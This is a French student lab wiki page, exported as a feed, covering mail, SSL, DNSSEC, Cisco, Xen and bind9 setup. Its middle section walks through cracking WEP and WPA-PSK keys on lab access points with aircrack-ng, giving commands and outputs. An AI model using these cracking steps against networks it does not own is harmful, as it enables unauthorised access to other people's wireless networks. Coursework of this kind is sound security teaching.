&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons repéré  la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-c permet de le selectrionner le channel de communication&lt;br /&gt;
-w le nom du fichier dans lequel airodump va enregistrer les données&lt;br /&gt;
--bssid permet d'indiquer l'adresse mac de la cible &lt;br /&gt;
--essid permet d'indique le ssid de la cible (nom du réseau)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
On peut visualiser le nombre de paquets qui transit. &lt;br /&gt;
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&lt;br /&gt;
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)&lt;br /&gt;
15:00:01  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8&lt;br /&gt;
&lt;br /&gt;
15:00:01  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:03  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:05  Sending Authentication Request (Open System) [ACK]&lt;br /&gt;
15:00:05  Authentication successful&lt;br /&gt;
15:00:05  Sending Association Request [ACK]&lt;br /&gt;
15:00:05  Association successful :-) (AID: 1) &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;br /&gt;
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. &lt;br /&gt;
Nous utilisons pour commencer&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F&amp;lt;/pre&amp;gt;&lt;br /&gt;
--encrypt permet de sélectionner le type d'encryption souhaité.&lt;br /&gt;
&amp;lt;pre&amp;gt; CH  6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  -34 100      738     1323   26   6  54e  WPA2 CCMP   PSK  Poneyus                                                &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  74:29:AF:F3:FD:91  -16    1e- 1     75      265                                                                   &lt;br /&gt;
 30:5A:3A:15:F6:3F  04:DB:56:3D:FD:A2  -40    0e- 0e  4709     1367 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option &amp;lt;i&amp;gt;handshake&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et nous pouvons utiliser la commande&lt;br /&gt;
&amp;lt;pre&amp;gt; aircrack-ng Poney.cap dico.txt&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt &lt;br /&gt;
Et au bout d'une heure nous parvenons à retrouver la clé WPA .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:16] 2857196 keys tested (792.44 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 02857193 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 &lt;br /&gt;
                       D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 &lt;br /&gt;
                       C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 &lt;br /&gt;
                       21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 &lt;br /&gt;
                       22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35657</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35657"/>
				<updated>2016-12-06T11:07:37Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;TABLE BORDER=&amp;quot;1&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;CAPTION&amp;gt; Voici le titre du tableau &amp;lt;/CAPTION&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; N° VLAN &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Prénom &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Réseau local &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Nom VM &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; @IP VM &amp;lt;/TH&amp;gt;&lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; VLAN20 &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Dimitri &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.20.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Vald &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.182/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; VLAN21 &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Nabil &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.21.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Pnl &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.177/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; VLAN22 &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Hugo &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.22.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gradur &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.178/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; VLAN23 &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Otmane &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.23.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Lartiste &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.179/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; VLAN24 &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Clement &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.24.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gringe &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.180/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; VLAN25 &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Joan &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.25.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Orelsan &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.181/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
&amp;lt;/TABLE&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;dmesg | grep tty&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour configurer notre Cisco, on utilise &amp;lt;i&amp;gt;minicom -os&amp;lt;/i&amp;gt; et pour cela nous devons être en root&lt;br /&gt;
&lt;br /&gt;
Une fois minicom lancé, on vient changer les paramètre de notre Cisco&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;A - Serial Device           : /dev/ttyUSB0&lt;br /&gt;
B - Lockfile Location       : /var/lock &lt;br /&gt;
C - Callin Program          :&lt;br /&gt;
D - Callout Program         :&lt;br /&gt;
E - Bps/Par/Bits            : 9600 8N1&lt;br /&gt;
F - Hardware Flow Control   : No&lt;br /&gt;
G - Software Flow Control   : No&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
On se connecte en admin sur le Cisco &lt;br /&gt;
&amp;lt;Pre&amp;gt;enable&lt;br /&gt;
config terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID&lt;br /&gt;
&amp;lt;pre&amp;gt;dot11 ssid MAMENE&lt;br /&gt;
authentication open&lt;br /&gt;
guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuraiton de l'interface Dot11Radio0&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key&lt;br /&gt;
encryption mode wep mandatory&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;access-list 701 permit 5cb9.0180.a039   0000.0000.0000&lt;br /&gt;
access-list 701 permit 3ca8.2a7a.05c5   0000.0000.0000&lt;br /&gt;
access-list 701 permit 7429.aff3.fd91   0000.0000.0000&lt;br /&gt;
access-list 701 permit 5cb9.0180.a139   0000.0000.0000&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
